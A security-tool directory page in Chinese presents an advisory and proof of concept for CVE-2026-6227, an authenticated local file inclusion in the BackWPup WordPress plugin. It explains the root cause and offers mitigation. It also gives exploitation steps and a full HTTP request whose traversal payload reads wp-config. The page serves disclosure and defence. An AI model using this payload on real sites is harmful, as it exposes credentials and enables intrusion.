Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6227 — CVE-2026-6227 的教育性概念验证,涉及 BackWPup WordPress 插件中经过身份验证的本地文件包含漏洞,包括根本原因分析、漏洞利用请求和缓解指南。 | Kitploit
工具/GitHubGitHub/pixel-defaultbr/cve-2026-6227
漏洞分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

CVE-2026-6227 的教育性概念验证,涉及 BackWPup WordPress 插件中经过身份验证的本地文件包含漏洞,包括根本原因分析、漏洞利用请求和缓解指南。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-6227:BackWPup 中的本地文件包含漏洞

CVSS Version Researcher

公告摘要

BackWPup 5.6.6 及更早版本受到通过 /wp-json/backwpup/v1/getblock REST 端点的 block_name 参数引发的已认证本地文件包含(LFI)漏洞影响。

该缺陷由对遍历序列进行非递归 str_replace() 清理所致,已在 5.6.7 版本中修复。

元数据

  • CVE:CVE-2026-6227
  • 严重性:高
  • CVSS 评分:7.2
  • 受影响产品:BackWPup WordPress 插件
  • 受影响版本:<= 5.6.6
  • 修复版本:5.6.7
  • 状态:已修补
  • 披露日期:2026-04-13
  • 研究人员:Pixel_DefaultBR

免责声明

本仓库严格用于教育和道德安全研究目的。此处提供的信息旨在帮助管理员和安全团队验证其系统。未经明确书面许可,请勿针对目标使用此信息。

受影响范围

  • 函数:BackWPupHelpers::component()
  • 端点:POST /wp-json/backwpup/v1/getblock
  • 参数:block_name
  • 访问级别:已认证管理员(或获得备份权限委派的用户)

根本原因分析

易受攻击的组件加载器在调用 include() 之前应用了非递归的 str_replace() 清理。这可以通过构造的遍历模式(如 ....// 或 ..././)绕过,从而允许攻击者控制路径解析。

影响

  • 从服务器文件系统包含任意本地 PHP 文件
  • 可能泄露敏感数据(例如 wp-config.php)
  • 在特定服务器/应用配置下可能实现远程代码执行

默认情况下,利用该漏洞需要管理员级别的访问权限。如果备份权限被委派,低权限用户也可能能够利用此问题。

利用前提条件

  • 有效的已认证 WordPress 会话
  • 有效的 REST nonce
  • 管理员权限或委派的备份权限

概念验证

场景:本地文件包含

  1. 使用具有 BackWPup 任务权限的账户登录 WordPress。
  2. 从插件界面触发正常请求,并使用代理拦截流量。
  3. 找到发送至 /wp-json/backwpup/v1/getblock 的合法 POST 请求。
  4. 将 block_name 替换为遍历载荷。

示例请求:

root@kitploit:~
POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
  1. 观察响应以验证文件包含行为。

时间线

  • 2026-03:向供应商报告漏洞
  • 2026-03-25:供应商在 5.6.7 版本中发布补丁
  • 2026-04-13:公开披露(CVE-2026-6227)

缓解措施

  • 将 BackWPup 更新至 5.6.7 或更高版本
  • 仅将 backwpup 权限分配给受信任的角色
  • 审查审计日志,查找对 /wp-json/backwpup/v1/getblock 的可疑访问

参考

  • 供应商插件页面:https://wordpress.org/plugins/backwpup/
  • CVE 参考(Wordfence):https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
下载工具